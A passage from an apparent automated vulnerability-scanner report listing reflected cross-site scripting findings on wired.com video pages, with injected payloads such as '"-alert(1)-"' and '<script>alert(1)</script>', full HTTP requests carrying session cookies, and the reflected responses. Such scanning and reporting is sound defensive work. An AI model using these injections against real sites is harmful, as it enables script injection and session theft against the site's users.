Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:38 GMT
Date: Mon, 22 Nov 2010 00:36:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest79878"><a>7a4f304f4cf">
...[SNIP]...

1.1069. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92bef"-alert(1)-"83beb12e69a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/181581663392bef"-alert(1)-"83beb12e69a/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:33 GMT
Date: Mon, 22 Nov 2010 00:37:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "181581663392bef"-alert(1)-"83beb12e69a","latest-videos","latest","behind-the-scenes-of-atts-distaster-response-team","video","648526227001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1070. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eefd"-alert(1)-"6be03000938 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team7eefd"-alert(1)-"6be03000938/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:50 GMT
Date: Mon, 22 Nov 2010 00:37:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","behind-the-scenes-of-atts-distaster-response-team7eefd"-alert(1)-"6be03000938","video","648526227001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1071. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7386"-alert(1)-"a9f8081c1bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-atts-distaster-response-team/648526227001c7386"-alert(1)-"a9f8081c1bd HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:43:05 GMT
Date: Mon, 22 Nov 2010 00:38:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","648526227001c7386"-alert(1)-"a9f8081c1bd","behind-the-scenes-of-atts-distaster-response-team","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1072. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e600f--><script>alert(1)</script>f14c661e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoe600f--><script>alert(1)</script>f14c661e1/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29487
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:16 GMT
Date: Mon, 22 Nov 2010 00:42:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoe600f--><script>alert(1)</script>f14c661e1/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001
-->
...[SNIP]...

1.1073. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8743f"><a>96446f44fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video8743f"><a>96446f44fa8/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29452
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:32 GMT
Date: Mon, 22 Nov 2010 00:41:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video8743f"><a>96446f44fa8 ss_latest-videos c_latest">
...[SNIP]...

1.1074. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdee2"-alert(1)-"8c37db9a46d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videosbdee2"-alert(1)-"8c37db9a46d/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:05 GMT
Date: Mon, 22 Nov 2010 00:43:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "650875857001","latest-videosbdee2"-alert(1)-"8c37db9a46d","behind-the-scenes-of-harry-potter-and-the-deathly-hallows","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1075. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408ee"><a>eb79182c383 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos408ee"><a>eb79182c383/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:17 GMT
Date: Mon, 22 Nov 2010 00:42:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos408ee"><a>eb79182c383 c_latest">
...[SNIP]...

1.1076. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a7f3"-alert(1)-"4f2d0accdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest6a7f3"-alert(1)-"4f2d0accdf/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:48:46 GMT
Date: Mon, 22 Nov 2010 00:44:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
t/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "650875857001","behind-the-scenes-of-harry-potter-and-the-deathly-hallows","latest-videos","1815816633","latest6a7f3"-alert(1)-"4f2d0accdf","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1077. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d617"><a>93407c07ac1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest7d617"><a>93407c07ac1/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:09 GMT
Date: Mon, 22 Nov 2010 00:43:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest7d617"><a>93407c07ac1">
...[SNIP]...

1.1078. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67771"-alert(1)-"6876dab4361 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/181581663367771"-alert(1)-"6876dab4361/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:23 GMT
Date: Mon, 22 Nov 2010 00:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
t/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "650875857001","behind-the-scenes-of-harry-potter-and-the-deathly-hallows","latest-videos","latest","181581663367771"-alert(1)-"6876dab4361","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1079. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417f2"-alert(1)-"53afbfa2f39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows417f2"-alert(1)-"53afbfa2f39/650875857001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:29 GMT
Date: Mon, 22 Nov 2010 00:44:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
t/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "650875857001","latest-videos","latest","1815816633","behind-the-scenes-of-harry-potter-and-the-deathly-hallows417f2"-alert(1)-"53afbfa2f39","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1080. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40b82"-alert(1)-"5c1018b5684 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/65087585700140b82"-alert(1)-"5c1018b5684 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:49:44 GMT
Date: Mon, 22 Nov 2010 00:44:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
t/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-of-harry-potter-and-the-deathly-hallows","latest-videos","latest","1815816633","65087585700140b82"-alert(1)-"5c1018b5684","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1081. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload bae29--><script>alert(1)</script>d1b8c531380 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videobae29--><script>alert(1)</script>d1b8c531380/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29459
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:32 GMT
